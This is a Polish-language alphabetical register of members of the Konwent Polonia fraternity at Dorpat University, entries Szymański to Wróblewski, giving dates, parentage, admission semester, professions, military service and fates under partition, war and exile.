 1281. Lech Konstanty Szymański, (1 sierpnia 1915 w Araucaria w Paranie w Brazylii - 20 stycznia 1999 w Brazylii) s. Juliusza (lekarza, prof. med. Uniwersytetu w Paranie, marszałka Senatu RP) i Kazimiery z Wałukiewiczów, absolwent Gimnazjum Tadeusza Rejtana w Warszawie 1934, student med. USB 1934-36 oraz UW 1936-39 (ukończył konspiracyjnie 1941), c. I sem. 1934/35, w czasie okupacji pracował jako okulista w szpitalu Maltańskim, żołnierz AK ps. “Świderski” w 1 Pułku Szwoleżerów, w powstaniu warszawskim w Dywizjonie 1806 “Gozdawa”, odznaczony Krzyżem Walecznych, posiadając obywatelstwo brazylijskie w 1947 wyjechał do Brazylii, prowadził klinikę medyczną w San Paulo i Cascavel [nr ew. 1485]
 1282. Franciszek Szymkiewicz, (1861 - ?) - s. Ignacego, z gub. kowieńskiej, coetus I sem. 1883, lekarz [894]
 1283. Aleksander Alfons Szyndler, (1880 - 1941) - coetus I sem. 1907, lekarz w Warszawie, major WP [1174]
 1284. Michał Szyrwiński, (1866 - ?) - mieszkał w Suwałkach, coetus I sem. 1887 [990]
 1285. Roman Śliczniakowski (”Drogomirski”), (1893 - 1923) - s. Antoniego, coetus II sem. 1914, POW, ochotnik WP, uczestnik bitwy pod Kaniowem i wojny 1920 r., odznaczony Krzyżem Walecznych i Croix de Guerre. Rtm. 15 p. uł. [1296]
 1286. Antoni Ksawery Śmiechowski, (3 grudnia 1867 w Warszawie - 6 września 1944 (?) w Warszawie) s. Władysława (lekarza) i Anny z Marczewskich, absolwent Gimnazjum II w Warszawie 1885, student i absolwent med. UD 1885-92 (dr med.), c. II sem. 1885, chirurg, od 1893 mieszkał w Warszawie, pracował w klinice Szpitala Dzieciątka Jezus, w czasie I wojny światowej chirurg w Lazarecie Miejskim, od 1923 w Szpitalu Zakaźnym św. Stanisława, ochotnik w wojnie 1920, od 1920 lekarz naczelny i szef sanitarny Polskiego Towarzystwa Czerwonego Krzyża, prezes Towarzystwa Lekarzy Polskich, działacz Towarzystwa Dobroczynności i Towarzystwa Higienicznego, od 1926 prezes Sądu Naczelnej Izby Lekarskiej, aktywny działacz Stronnictwa Narodowo-Demokratycznego, poległ w powstaniu warszawskim (wg innej wersji więzień Pawiaka, zamordowany w więzieniu na Gęsiej 16 czerwca 1944) [nr ew. 960]
 1287. Kazimierz Śniadecki, (1830 - ?) - ziemianin z gub. wileńskiej [345]
 1288. Hipolit Świątecki, (1811 - przed 1889) - z Wileńszczyzny, coetus II sem. 1828, lekarz [20]
 1289. Henryk Świda, (1828 - przed 1889) - ziemianin z pow. borysowskiego, coetus I sem. 1848 [307]
 1290. Mieczysław Świderski, (1879 - 1915) - z Kaliskiego, coetus I sem. 1907, lekarz [1173]
 1291. Stanisław Świderski, (1887 - 1950) - s. Leopolda, coetus II sem. 1908, adwokat w Warszawie [1221]
 1292. Wiesław Świerczyński, (1882 - ?) - s. Józefa, z Kaliskiego, coetus I sem. 1907, lekarz [1176]
 1293. Emanuel Świrski, (1864 - po 1914) - s. Piotra, brat Jerzego (697), coetus I sem. 1884, lekarz w Kerczu i na Podolu [927]
 1294. Jerzy Świrski, (1853 - 1910) - s. Piotra, brat Emanuela (927), coetus I sem. 1872, lekarz, doc. Uniw. Dorpackiego [697]
 1295. Leonard Tallen-Wilczewski, (1857 -1933) s. Franciszka, ziemianin, coetus II sem. 1875, adwokat w Warszawie, współzałożyciel (1907 r.) Tow. b. Wychowanków Uniw. w Dorpacie [740]
 1296. Aleksander Tallen-Wilczewski, (1885 -1968) - s. Leonarda (740), coetus II sem. 1908, w 1920 r. ochotnik WP, odznaczony Krzyżem Walecznych. Adwokat w Warszawie [1218]
 1297. Edmund Taraszkiewicz, (1841 - po 1886) - coetus I sem. 1865, lekarz w marynarce woj. Władywostok, Kronsztad [624]
 1298. Jerzy Taraszkiewicz, (1861 - ?) - z Kowieńszczyzny, coetus I sem. 1883, studiów nie skończył [898]
 1299. Ludwik Targoński, (1816 - ?) - z guberni witebskiej, ziemianin, coetus I sem. 1835 [83]
 1300. Adam Antoni bar. Taube, (1859 - ?) herbu własnego, s. Karola Eugeniusza i Michaliny z Czekierskich, brat stryjeczny Aleksandra (Arkonia), c. II sem. 1880 [nr ew. 847], nauczyciel gimnazjum polskiego w Chinach
 1301. Walerian Teich, (1834 - 1874) - coetus II sem. 1858, delegat Konwentu w 1861 r do W-wy (w sprawie utworzenia Uniwersytetu), uczestnik nabożeństwa patriotycznego 8 V 1861 r,. w Wilnie. Lekarz (w Siedlcach) [582]
 1302. Karol Teichmann-Stawiarski, (1826 - 1890) - s. Fryderyka, coetus II sem. 1847, pastor e.a., superintendent kaliski [293]
 1303. Ludwik Teichmann-Stawiarski, (1823 - 1895) - s. Jakuba, coetus I sem. 1847, anatom, prof. i rektor U. J., v-prezes AU [275]
 1304. Aleksander Tetzner, (1822 - 1849) - s. Jerzego, brat Karola (138), coetus II sem. 1842, pastor e.a. w Ossowie [209]
 1305. Karol Tetzner, (1816 - 1887) - s. Jerzego, brat Aleksandra (209), coetus I sem. 1838, pastor e.a. w Węgrowie [138]
 1306. Stanisław Thugutt, (1862 - 1956) - s. Stanisława, coetus I sem. 1882, jeden z najwybitniejszych mineralogów polskich, członek PAU, prof. i rektor Uniw. Warszawskiego, założyciel i red. „Archiwum Mineralogicznego”, dr h. c. Uniw. w Tartu [870]
 1307. Adolf Tochtermann, (1866 - 1950) - s. Henryka I (234), brat Henryka II (911), coetus II sem. 1884, lekarz w Łodzi [937]
 1308. Henryk Tochtermann I, (1823 - 1905) - s. Michała, ojciec Henryka (911), coetus II sem. 1844, pastor e.a. w Ossówce [234]
 1309. Henryk Tochtermann II, (1864 - 1929) - s. Henryka I (234), brat Adolfa (937), coetus II sem. 1883, pastor e.a. w Pilicy i Radomiu [911]
 1310. Henryk Tochterman III, (1891 - 1929) - coetus I sem. 1912, pastor e.a. w Radomiu [1267]
 1311. Włodzimierz Samson Samson-Toczyłowski, (1911- 28 marca 1996) - s. Leopolda, coetus I sem. 1930/31, magister prawa, aplikant adwokacki w Sosnowcu, żołnierz września, w niewoli sowieckiej, trzymany w Kijowie, po wybuchu wojny z Niemcami przewieziony do Starobielska. Wyszedł z II Korpusem, ppor. II Warszawskiej Dyw. Pancernej. Emigrował do Argentyny, koresp. zagr., pracownik i pisarz naukowy, zmarł w domu opieki. Pozostawił wspomnienia [1438]
 1312. Włodzimierz Tołtyszewski, (1835 - 1882) - coetus I sem. 1855, urzędnik w Warszawie [510]
 1313. Leopold Tomaszewicz, (1810 - ok. 1874) - coetus II sem. 1828, lekarz powiatowy w m. Kopyś, gdzie zmarł [18]
 1314. Aleksander Towgin, (1881 -?) - z Mitawy (Jelgava), Łotwa, coetus II sem. 1902 [1151]
 1315. Mikołaj Treiczke, (1822 - ?) - coetus II sem. 1841, lekarz na Podolu [193]

  Jan Trószyński, ok. 1916 r.

 1316. Jan Trószyński, (1894 - 1971) - brat Wacława (1286), coetus I sem. 1915, ostatni olderman dorpacki, autor Kodeksu Postępowania Honorowego (Usus Dorpatensis), ochotnik WP (1918 - 20). W 1939 r. mjr, naczelny lekarz 55 p. piech. [1297]

 1317. Wacław Trószyński, (1892 - 7 maja 1970) - brat Jana (1297), coetus II sem. 1913, ochotnik WP (1918 - 20), przemysłowiec w Warszawie [1286]

  Tomasz Trynkowski, lata 20-te.

 1318. Tomasz Trynkowski, (7 marca 1903 w Wilnie - 7 czerwca 1967 w Otwocku) s. Mikołaja i Marii-Reginy z d. Kudrewicz, uczeń gimnazjów w Wilnie i Nowogrodzie, ochotnik w 211 Pułku Ułanów w wojnie polsko-rosyjskiej 1920, absolwnet Gimnazjum im. Króla Zygmunta Augusta w Wilnie 1921, student prawa USB 1921-30, c. I sem. 1924/25, skarbnik sem. let. 1925/26, olderman sem. let. 1926/27, prezes sem. zim. 1928/29, wiceprezes sem. zim. 1929/30, wyróżniony pierścieniem filisterskim 1932, od 1921 urzędnik Izby Skarbowej Wilnie, a od 1923 Wileńskiego Banku Ziemskiego, w 1945 aresztowany przez NKWD i przetrzymywany przez miesiąc w więzieniu w Nowej Wilejce, w 1945 ekspatriowany, krótko pracował w Jeleniej Górze, ciężko chory na gruźlicę od 1952 mieszkał w Otwocku, pochowany na Cmentarzu w Otwocku [nr ew. 1380]

 1319. Seweryn Trzciński, (1827 - ?) - s. Wojciecha (?) ziemianin z gub. radomskiej, coetus I sem. 1848 [303]
 1320. Stanisław Trzebiński, (1861 - 1930) - s. Adolfa, coetus II sem. 1886, lekarz, historyk i filozof medycyny, prof. USB, Kurator Konwentu z ramienia senatu USB (1925-1930) [987]
 1321. Stefan Trzebiński, (1885 - 1948) - coetus II sem. 1907, w I korpusie WP (l. 1917 -18), płk., d-ca 3. Dyw. Art. Konnej (1918 - 31), odznaczony Virtuti Militari i Krzyżem Walecznych (dwukrotnie) [1191]
 1322. Krzysztof Trzeciak, (1838 - ?) - coetus I sem. 1858, ciężko ranny w powst. 1863 r., zesłany do gub. irkuckiej [572]
 1323. Mieczysław Tukałło, (1817 - 1883) - s. Ignacego, ziemianin, coetus I sem. 1834, za powstanie 1863 r., zesłany [70]
 1324. Józef Twardowski, (1846 - ?) - coetus I sem. 1867, mieszkał w Paryżu [650]
 1325. Paweł Twardowski, (1837 - ?) - coetus II sem. 1869, lekarz w Maciejowicach (gub. siedlecka) [672]
 1326. Jan Bogumił Tydelski, (1817 - 1868) - s. Michała, coetus I sem. 1839, pastor e.a. w Włocławku, uczestnik powstania 1863 r. [147]
 1327. Witold Tymiński, (1919 - 6 maja 1996 w Warszawie) - s. Józefa, coetus II sem. 1937/38, ppor. AK („Baza” - grupa dywers. wil.), odzn. Krzyżem Walecznych, po wojnie prof. zw., prorektor Akademii Medycznej w Gdańsku [1503]

  Wacław Tyrchowski, ok. 1916 r.

 1328. Wacław Tyrchowski, (1895-1940) - s. Władysława, coetus I sem. 1915, adwokat w Warszawie, członek ruchu oporu, zamordowany przez Niemców 20 VI w Palmirach. [1300]

 1329. Stanisław hr. Tyszkiewicz, (1888 - 1965) - coetus II sem. 1912, ziemianin, działacz samorządowy w Warszawie [1277]
 1330. Tadeusz Tyszkiewicz, (1891-1937) - coetus II sem. 1913, lekarz, kpt. WP [1282]
 1331. Ignacy Ulanowski, (1833 - po 1874) - brat Władysława (382), ziemianin, coetus I sem. 1852, za powst. 1863 r. zesłany [416]
 1332. Władysław Ulanowski, (1832 - 1872) - brat Ignacego (416), ziemianin, coetus II sem. 1850, lekarz, zesłany za powst. 1863 r. [382]
 1333. Konrad Uliński, (1872 - po 1917) - coetus II sem. 1901, lekarz (w 1917 r. w Petersburgu) [1137]
 1334. Jakub Umiastowski, (1814 - 1847) - ziemianin w guberni kowieńskiej, coetus I sem. 1834 [75]
 1335. Franciszek Ungern-Sternberg, (1838-1912) - s. Konstantego. brat Stanisława (578), coetus I sem. 1857, Gospodarz „Ogółu”, lekarz, botanik, emigrant (Garibaldczyk) [534]
 1336. Stanisław Ungern-Sternberg, (1836 - ?) - s. Konstantego, brat Franciszka (534), ziemianin z gub. mohylewskiej, coetus II sem. 1858 [578]
 1337. Henryk Unrug, (1869 - 1888) - z Lubelszczyzny, coetus II sem. 1887, zmarł w czasie studiów [1009]
 1338. Aleksander Untulis, (1882 - ?) - coetus II sem. 1903, na konwencie 14 X 1908 r. „prosił o skreślenie z listy, gdyż uważa siebie za Litwina, a Konwent jest stowarzyszeniem polskim” [1155]
 1339. Jarosław Urbanowicz, (1859 - ?) - coetus II sem. 1878, urzędnik kolei Ryga - Dyneburg [802]
 1340. Franciszek Ustrzycki, (1816 - przed 1889) - coetus II sem. 1841, nauczyciel prywatny [192]
 1341. Eugeniusz Uthke, (1859 - 1926) - coetus II sem. 1879, pastor e.a., wicedyrektor Gimnazjum Realnego w Sosnowcu [817]
 1342. Marek Uzłowski, (1829 - ?) - ziemianin z Mińszczyzny, coetus I sem. 1849 [334]
 1343. Stanisław Uzłowski, (1830 - po 1906) - s. Franciszka, coetus I sem. 1847, lekarz m. in. w Kiszyniowie [286]
 1344. Kazimierz Virion, (1840 - 1878) - s. Jana, brat Włodzimierza (398) i Stanisława (435) ziemianin z białostockiego, coetus II sem. 1859 [592]
 1345. Stanisław Virion, (1832 - 1909) - s. Jana, brat Włodzimierza (398) i Kazimierza (592), ziemianin z białostockiego, coetus II sem. 1852 [435]
 1346. Włodzimierz Virion, (1833 - 1896) - s. Jana, brat Stanisława (435) i Kazimierza (592), ziemianin na Białostocczyźnie, coetus II sem. 1851, marszałek szlachty powiatu grodzieńskiego, zginął w katastrofie kolejowej [398]
 1347. Witold Vogtman Michorowski, (1894 - 1955) - coetus II sem. 1911, rotmistrz 6 Pułku Ułanów Kaniowskich. [1258]
 1348. Karol Wagner, (1824 - 1851) - coetus I sem. 1842, pastor e.a. w Łomży [198]
 1349. Paweł Wagner, (1824 - przed 1889) - coetus I sem. 1845, nauczyciel gimnazjum w Słucku, następnie w Królestwie [245]
 1350. Ludwik Waibel, (1838 -1863) - coetus II sem. 1856, lekarz w Mińsku [532]
 1351. Michał Wojewódzki, (1899 - 1986) - ochotnik WP (1919 - 22), coetus I sem. 1923/24, przed wojną pracował w policji [1369]
 1352. Adam Walent, (1871 - 1927) - s. Józefa, coetus II sem. 1890, lekarz w Tartu [1062]
 1353. Władysław Waleszyński, (16 kwietnia 1865 na Lubelszczyźnie - ?) - s. Stanisława, ukończył gimnazjum w Warszawie, student Wydziału Mechanicznego Politechniki Ryskiej, coetus 1885 Welecja, wystąpił 1885, pózniej student prawa i medycyny Uniwersytetu w Dorpacie, coetus I sem. 1885 Konwent Polonia [948]
 1354. Cyprion Colonna-Walewski, (1820 - 1873) - s. Michała, brat Władysława (141), coetus II sem. 1839, bibliofil, bibliograf. [154]
 1355. Władysław Colonna-Walewski, (1819-1890) - s. Michała, brat Cypriana (154), coetus II sem. 1838, współwydawca Słownika Geograficznego Królestwa Polskiego [141]
 1356. Władysław Walewski, (1874 -1904) - s. Juliusza, coetus I sem. 1897, lekarz w Warszawie [1113]
 1357. Alfons Walicki, (1808 - 1858) - s. Józefa, coetus II sem. 1828, prof. Uniw. w Charkowie (lit. greckiej i starożytności) [16]
 1358. Julian Walicki, (1817 - 1840) - s. Józefa, coetus II sem. 1836, uczestnik spisku Hildebrandta, zmarł w więzieniu, poeta [106]

  Witold Waligórski, ok. 1916 r.

 1359. Witold Waligórski, (7 lutego 1895 w maj. Skirdzimy (Skirdziny?) - 14 grudnia 1953 w Poznaniu) s. Konstantego, uczeń Szkoły gen. Chrzanowskiego w Warszawie (matura Jenisejsk 1914), student prawa UD 1915, oraz med. 1915-18 UD, absolwent dr med. UW 1923, c. I sem. 1915, ochotnik WP 1918, lekarz wojskowy w Poznaniu, we wrześniu 1939 szef służby sanitarnej w stopniu majora w Wielkopolskiej Brygadzie Kawalerii w składzie Armii “Poznań”, od września 1939 lekarz w Szpitalu Ujazdowskim w Warszawie, w czasie powstania warszawskiego lekarz, ewakuowany ze szpitalem, po wojnie współorganizator odbudowy szpitala wojskowego w Poznaniu, ordynator oddziału ocznego tego szpitala, awansowany do stopnia ppłk WP [nr ew. 1298]

 1360. Stanisław Waltz, (1831 - ?) - ziemianin ?, coetus II sem. 1853 [460]
 1361. Adam Wańkowicz, (1827 - 1875) - s. Walentego, ziemianin, coetus II sem. 1847, za powst. 1863 r. zesłany, zmarł na zesłaniu [296]
 1362. Jan Wariakois (Variakojis), (1873 - ?) - s. Piotra, Litwin, coetus II sem. 1893, włościanin, prawnik [1090]
 1363. Tadeusz Wartman, (1908 - ?) - s. Witolda, coetus I sem. 1930/31 [1437]
 1364. Aleksander Wasilewski, (1884 - 1944) - s. Edwarda, coetus II sem. 1907, autor konwentowego ceremoniału nadania barw (5 IV 1915), w czasie wojny z bolszewikami naczelny lekarz w 14 p. uł. Jazłowieckich - odznaczony Virtuti Militari i Krzyżem Walecznych, kpt WP. Poseł do ostatniego Sejmu RP przed 1939 r. Poległ 12 XII 1944 r. pod Anconą [1183]
 1365. Walery Waszkiewicz, (1816 - ?) - coetus II sem. 1833, urzędnik w guberni grodzieńskiej i Saratowie [60]
 1366. Ksawery Watraszewski, (1853-1929) - coetus II sem. 1872, autor słów kilku piosenek konwentowych, lekarz, znany warszawski spirytysta, Prezes Stowarzyszenia Filistrów Konwentu w Warszawie [704]
 1367. Edward Waydel (Weidel), (1849 -1882) - s. Bogumiła, coetus II sem. 1865, współkompozytor konwentowej „operetki” - Na kwaterze. Pastor kościoła ewangelicko-reformowanego w Serejach k. Suwałk [633]
 1368. Bolesław Ważyński, (1827 - ?) - s. Antoniego, coetus II sem. 1848, urzędnik [324]
 1369. Edward Skarbek-Ważyński, (1816 - 1866) - s. Marcina, coetus II sem. 1833, marszałek szlachty pow. oszmiańskiego, ziemianin [55]
 1370. Felicjan Ważyński, (1828 - 1880) - s. Bartłomieja, ziemianin w gub. kowieńskiej, coetus I sem. 1850, zesłany za powst. 1863 r. [358]
 1371. Kandyd Edward Wąż, (1814 - 1892) - s. Franciszka, ziemianin, coetus II sem. 1837, zbieracz książek [127]
 1372. Józef Wczelka, (1824 - po 1863) - s. Franciszka, ziemianin, coetus II sem. 1841, emigrant (Włochy) [195]
 1373. Władysław Weil, (1863 - 1913) - coetus II sem. 1885, aptekarz w Łodzi [954]
 1374. Teofil Welke, (1828 - ?) - s. Jakuba, coetus I sem. 1847, urzędnik na Kaukazie [280]
 1375. Bronisław Wenckiewicz (Węckiewicz), (1853 - 1880) - coetus I sem. 1875, zm. w Dorpacie, tuż po uzyskaniu tytułu dr med. [733]
 1376. Bohdan Wendorff, (1904 - 26 czerwca 1998 w Londynie) - s. Oskara (Arkonia), Gospodarz Stulecia K!, jeden najbardziej zasłużonych dla K! na emigracji. Ochotnik WP (1919 - 21), wicestarosta wileński, starosta w Brasławiu, sekretarz wojewodów wileńskich (Raczkiewicza, Beczkowicza, Jaszczołta). We wrześniu 1939 r. przez Łotwę wydostał się na Zachód. Major broni pancernej. Odznaczony Krzyżem Walecznych (za kampanię francuską). Walczył w 10 Brygadzie Pancernej I Dywizji Gen. Maczka. Uczestnik inwazji. Pułkownik WP. Od 1946 r. oficer do zleceń prezydentów RP (Raczkiewicza, Zaleskiego, Ostrowskiego), w l. 1958 - 1968 członek Rady Rzeczypospolitej w Londynie. 1975 - 90 szef Kancelarii Ogólnej prezydenta RP (nazywano go „klucznik Zamku”), zmarł w Londynie [1394]
 1377. Edward Wende, (1874 - 1949) - s. Edwarda, coetus II sem. 1893, pastor e.a., superintendent kaliski. W latach wojny uczestnik konspiracji kościelnej. Wybitny kaznodzieja. [1089]
 1378. Fryderyk Wendt, (1835 -1920) - s. Jerzego, coetus II sem. 1855, pastor e.a w Rawie i Nowosolnej [517]
 1379. Henryk Wendt, (1886 - 1970) - s. Fryderyka (517), coetus II sem. 1909, pastor e.a. Więziony na początku okupacji w Radgoszczy, wysiedlony do Gen. Guberni. W Warszawie działał w tajnym nauczaniu [1238]
 1380. Władysław Wernitz, (1832 - 1917) - s. Wilhelma, coetus II sem. 1850, pastor e.a., superintendent diec. augustowskiej [371]
 1381. Władysław Wernitz II, (1860 - 1920) - s. Władysława (371), coetus I sem. 1879, pastor e.a. w Kielcach i Rypinie [808]
 1382. Adam Werpachowski, (1888 - 1946) - coetus II sem. 1909, mjr WP, Warszawa [1234]
 1383. Antoni Werpachowski, (1879 - 1930) - coetus I sem. 1907, lekarz w Ostrowiu Łomżyńskim, mjr WP. (1918 - 1930) [1177]
 1384. Józef Weyssenhoff, (8 kwietnia 1860 w maj. Kolano na Podlasiu - 6 lipca 1932) herbu Łabędź, s. Michała i Wandy z hr Łubieńskich, s. Michała (Konwent Polonia, nr ew. 261) i Wandy z Łubieńskich, brat Waldemara (Arkonia), student prawa UD 1879-1884, c. II sem. 1879 [nr ew. 820], vorsteher w Konwencie (1881), autor sztuk konwentowych, po studiach gospodarował w dobrach w Samoklęskach na Lubelszczyźnie, od 1891 mieszkał w Warszawie, od 1896 wydawca “Biblioteki Warszawskiej”, podróżował po Europie, mieszkał w Steglitz pod Berlinem 1908-1911, w czasie I wojny światowej przebywał w Rosji, w 1918 wrócił do Polski, osiedlił się w Warszawie, później mieszkał w Bydgoszczy, znany powieściopisarz (m.in. “Żywot i myśli Zygmunta Podfilipskiego”, “Soból i panna”), poeta, krytyk literacki, piewca ziemiaństwa krasowego i łowów, autor opracowania “Wspomniania z Dorpatu (1879-1884)” (Biuletyn Zarządu SFPKA, nr 13, Warszawa 1997, s. 86 i n.), pochowany na warszawskich Powązkach, jego imieniem nazwano w Bydgoszczy ulicę Zacisze, przy której mieszkał, a w 1960 na frontonie budynku, w którym mieszkał, odsłonięto poświęconą mu tablicę pamiątkową wykonaną przez Bronisława Zygfryda Nowickiego (Baltia)
 1385. Karol Antoni Weyssenhoff, (23 września 1913 w Dyneburgu - 9 czerwca 1977) herbu Łabędź, s. Waldemara (Arkonia) i Marii z Ledóchowskich, wnuk Michała (Konwent Polonia, nr ew. 261), brat Franciszka (Arkonia), c. I sem. 1932/33, żołnierz AK, więziony przez Niemców (więzienie na Łukiszkach w Wilnie), w 1945 r. wywieziony do ZSRR, wrócił. dr ekonomii, pracownik nauk. SGGW [nr ew. 1458]

  Michał Weyssenhoff

 1386. Michał Józef Weyssenhoff, (23 kwietnia 1828 w Jużyntach na Litwie - 18 sierpnia 1866 w Tarnowie w pow. wiłkomirskim) herbu Łabędź, s. Franciszka i Petroneli z d. Paprocka, ojciec Józefa (Konwent Polonia, nr ew. 820) i Waldemara (Arkonia), dziadek Karola (Konwent Polonia, nr ew. 1458) i Franciszka (Arkonia), ziemianin, c. I sem. 1846, pochowany w Jużyntach [nr ew. 261]

 1387. Bohdan Węcławowicz, (1888 - 1918) - s. Waleriana, coetus II sem. 1911, por. 7 p. uł. (w Korp. Wschodnim), poległ po Niemirowem [1259]
 1388. Henryk Węcławowicz, (1828 - po 1885) - s. Onufrego, brat Onufrego (287), ziemianin, coetus II sem. 1846 [273]
 1389. Ludwik Węcławowicz, (1819 - 1885) -s. Antoniego, brat Waleriana (80), ziemianin, coetus II sem. 1838 [146]
 1390. Onufry Węcławowicz, (1830 - 1883) - s. Onufrego, brat Henryka (273), ziemianin, coetus I sem. 1847, za powst. 1863 r. zesłany [287]
 1391. Walerian Węcławowicz, (1815 - 1885) -s. Antoniego, brat Ludwika (146), ziemianin, coetus II sem. 1834 [80]
 1392. Benedykt Wialbutt, (1832 - ok. 1880) - coetus I sem. 1853, ziemianin z gub. wileńskiej [456]
 1393. Michał Wielhorski, (1891 -1942) - s. Władysława, coetus II sem. 1912, ochotnik WP (1918 - 21), ppor. 13 p. uł., inspektor PZU w Słonimiu, członek ZWZ - AK, zamordowany przez Niemców 28 X [1279]
 1394. Henryk Wiełłowicz, (1908 -3 kwietnia 1992) - s. Witolda, coetus II sem. 1933/34, żołnierz września, wrócił do Wilna, aresztowany przez NKWD 19 VII 1940, wywieziony do ZSRR, wyszedł z II Korpusem, za kampanię włoską odzn. Krzyżem Walecznych. kpt. WP, po wojnie leśniczy w Szkocji [1476]
 1395. Julian Wierciochowski, (1819 - ?) - s. Tomasza, coetus I sem. 1840, zmarł w czasie studiów [160]
 1396. Adam Wierciński, (1864 - 1902) - coetus II sem. 1883, lekarz w gub. kurskiej [904]
 1397. Tadeusz Wierzbowski, (1892 - 1920) - coetus II sem. 1910, kpt WP, sędzia śledczy poległ w czasie polskiej ofensywy 25 VIII [1252]
 1398. Franciszek Wierzejski, (1843 - ?) - s. Jana, coetus II sem. 1871, lekarz w Zamościu ? [695]
 1399. Alojzy Wierzchlejski, (1860 - 1938) - s. Romana, ziemianin, student Politechniki Ryskiej, przyjęty 1880 do Arkonii (nr ew. 159), wystąpił 1883, przeniósł się na Uniwersytet Dorpacki, coetus II sem. 1883 Konwent Polonia, w 1887 r. Sekretarz Tow. Handlu i Rektyfikacji Spirytusu w Warszawie [919]
 1400. Jan Więckowicz, (1897 - ?) - coetus II sem. 1920/21, POW, ochotnik WP (1918 - 21) [1328]
 1401. Adam Wikszemski, (1847 - 1890) - s. Franciszka, coetus II sem. 1865, lekarz, prosektor Inst. Anatomicznego Uniw. w Dorpacie. Wynalazca (w 1889 r.!) metody „fotograficznej rejestracji drgań dźwiękowych” [630]
 1402. Romuald Wilczewski, (1909 - po 1945) - z Białegostoku, coetus I sem. 1929/30 [1431]
 1403. Janusz Winiarski, (1879 - 1952) - coetus I sem. 1907, sędzia w Płońsku, notariusz w Chorzelach [1172]
 1404. Józef Winiarski, (1865 - 1919) - coetus II sem. 1886, lekarz w Warszawie [984]
 1405. Wilhelm Winkler, (1830 - 1917) - s. Wilhelma, coetus I sem. 1850, pastor e.a. w Wieluniu [350]
 1406. Oskar Wińcza, (1907- 3 grudnia 1993) - s. Oskara, brat Władysława (1404), coetus II sem. 1926/27, sędzia, uciekł przed bolszewikami do Gen. Guberni. W 1944 r. wywieziony na roboty do Niemiec. Wrócił w 1947 r., prac. jako sędzia w Białymstoku [1406]
 1407. Władysław Wińcza, (1906 - 17 listopada 1984) - s. Oskara, brat Oskara (1406), coetus II sem. 1926/27, adwokat, latem 1940 z żoną i córką uciekł do Gen. Guberni. W 1945 r. z rodziną uciekl na zachód i w 1947 r. osiadł w Afryce, w Tanzanii, następnie Kenii, miał prosperujące przedsiębiorstwo „Hunters & Guides Ltd.”. Znakomity myśliwy, wicedyrektor „Proffesional Hunters Associations of East Africa”. W 1977 r. pozbawiony licencji, przeniósł się do RPA. Zm. Johannesburg [1404]
 1408. Jan Wiszniewski I, (1822 - po 1867) - s. Jana, brat Tadeusza (215) i Ryszarda (247), coetus I sem. 1843, za powst. 1863 r., zesłany do gub. penzeńskiej [214]
 1409. Jan Wiszniewski II, (1861 - 1936) - s. Jana (214), coetus II sem. 1883, ziemianin z pow. mozyrskiego, poseł do Dumy (1906), adwokat w Sarnach [915]
 1410. Ryszard Wiszniewski, (1826 - 1860) - s. Jana, brat Jana I (214) i Tadeusza (215), coetus I sem. 1845, prof. Uniw. w Petersburgu, meteorolog [247]
 1411. Tadeusz Wiszniewski, (1823-1863) - s. Jana, brat Jana (214) i Ryszarda (247), coetus I sem. 1843, zesłany za powst. 1863 r., zm. na zesłaniu w Krasnoufimsku [215]
 1412. Julian Prus-Wiśniewski, (1915 - 24 marca 1986) - s. Stanisława, coetus II sem. 1935/36, senior K! na emigracji (po 1984 r.), por. WP, odznaczony Krzyżem Walecznych, służył u gen. Maczka. Zmarł w Londynie [1494]
 1413. Stanisław Witkowski, (1848 - ?) - z Podola, coetus II sem. 1869 [673]
 1414. Aleksander Witort, (1861 - 1917) - s. Adolfa, coetus II sem. 1882, lekarz w Poniewieżu [875]
 1415. Kamil Włodek, (1839 - ?) - ziemianin gub. Grodzieńskiej, coetus I sem. 1859 [586]
 1416. Napoleon Wodyński, (1829 - 1853) - coetus I sem. 1848, zmarł w czasie studiów [310]
 1417. Władysław Wodyński, (1827 - 1862) - coetus II sem. 1845, ziemianin [260]
 1418. Leopold Wojak, (1867 - 1962) - s. Jana, coetus I sem. 1887, pastor e.a. w Częstochowie [989]
 1419. Józef Wojnar, (1864 - po 1924) - s. Józefa, coetus I sem. 1887, lekarz, po 1924 r. „zaginął” w ZSRR [998]
 1420. Teodozy Wojnarowski, (1828 - po 1877) - s. Franciszka, coetus I sem. 1851, lekarz m. in. w Przasnyszu [394]
 1421. Andrzej Wolf, (1830 - 1903) - s. Karola, coetus II sem. 1847, wybitny prawnik, adwokat, za powst. 1863 r. zesłany [291]
 1422. Michał Wolff, (1812 - 1887) - s. Józefa, coetus II sem. 1832, uczestnik powst. listopadowego, lekarz [45]
 1423. Stanisław Wolfram, (1884 - ?) - s. Stanisława, coetus I sem. 1910, lekarz [1247]
 1424. Henryk Wołodźko, (1830 - 1888) - s. Juliana, coetus I sem. 1849, lekarz, za powst. 1863 r. zesłany [335]
 1425. Tomasz Wojtkiewicz, (1835 - przed 1913) - s. Franciszka, coetus I sem. 1857, lekarz w pow. poniewieskim [541]
 1426. Ignacy Wojtkuński, (1818 - 1878) - coetus II sem. 1836, urzędnik, wicedyr. 2 dep. Min. Dóbr Państwowych [107]
 1427. Czesław Woronowicz, (1866 -?) - z Kowieńszczyzny, coetus II sem. 1890, lekarz [1056]
 1428. Herman Woronowicz, (1845 - po 1877) - coetus I sem. 1866, nauczyciel w Liceum Aleksandrowskim w Petersburgu [640]
 1429. Hugo Wosch, (1870 - 1938) - s. Adolfa, coetus I sem. 1890, pastor e.a., superintendent płocki [1051]
 1430. Jerzy Woyciechowski, (1904 - 1951) - ochot. WP (1920), coetus I sem. 1923/24, przemysłowiec (współwłaściciel wytwórni odlewów przy ul. Chocimskiej w W-wie), żołnierz września, żołnierz AK (W-wa) [1365]
 1431. Włodzimierz Skarbek-Woyczyński, (1859 - ?) - coetus II sem. 1879, dr praw, ziemianin z gub. grodzieńskiej [814]
 1432. Adam (Paszkiewicz-)Woyzbun, (1869 - 1898) - z Warszawy, coetus I sem. 1890, lekarz [1052]
 1433. Henryk Wójcicki, (1859 - ?) - z Kielc, studiował medycynę, coetus II sem. 1884 [939]
 1434. Bronisław Wróblewski, (1888 - 1941), s. Józefa, coetus I sem. 1915, Kurator Konwentu z ramienia Senatu USB, napisał (m.in.): Ideologia korporacyj akademickich (Wil. 1928). Wybitny prawnik karnista, prof. prawa karnego USB. Zmarł na atak serca podczas rewizji swojego wileńskiego mieszkania przez Niemców [1301]
 1435. Teobald Wróblewski, (1853 - ?) - coetus II sem. 1876, lekarz na Litwie [754]
 1436. Teodor Wróblewski, (1816 - po 1884) - ojciec Teodora (Welecja), aptekarz w Kownie [222]
